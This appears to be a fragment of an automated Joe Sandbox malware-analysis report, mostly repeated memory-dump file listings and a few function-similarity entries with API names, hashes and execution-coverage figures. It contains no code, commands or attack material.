                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                                                                                • Instruction ID: da7243ee1f940096ed28c2dd433500c0dcf86598e6cb04ddb1c8fe15205662c5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2E08C32A21228EBCB14EB98C904A8AF7ECFB4AB01B650096F501D3151C270DF00C7D0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 57040152-0
                                                                                                                                                                                                                                • Opcode ID: 73c4790e5db93271ec562cbd445c16afb12c923f29862d523ef878e682105e28
                                                                                                                                                                                                                                • Instruction ID: 0e887f780b3cd126549a91179a53dbd9cc72776148c04069999b0221ad8702cb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73c4790e5db93271ec562cbd445c16afb12c923f29862d523ef878e682105e28
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4A1E0B0A017159FEB20DB74C944BABB7E9FF15351F048529EC16D7282EB35EA08CB91
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _strrchr
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3213747228-0
                                                                                                                                                                                                                                • Opcode ID: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
                                                                                                                                                                                                                                • Instruction ID: 7f5f487cca1cc5536369cb1e0ee79ab529e00db0fdc3bd1797757d154b9d6e49
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7B102329046459FEB25AF28C881FEEBBF5FF55350F14816AE895EB242D6349D01CB70
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 531285432-0
                                                                                                                                                                                                                                • Opcode ID: 17e4e34786f0a56fdf2cbeba91fd2f247c075c2c1cadd3287473e32bbc317378
                                                                                                                                                                                                                                • Instruction ID: fa0e8a2299ba8f4ebaa2b2d5d88131debf94ec79954e7eea08c93667e26e2e36
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17e4e34786f0a56fdf2cbeba91fd2f247c075c2c1cadd3287473e32bbc317378
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58211D71A00219AFEF00EBA4D895DFEB7BAEF08710F500425F501A7252DB349E419BA0

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:0.9%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                Total number of Nodes:610
                                                                                                                                                                                                                                Total number of Limit Nodes:4
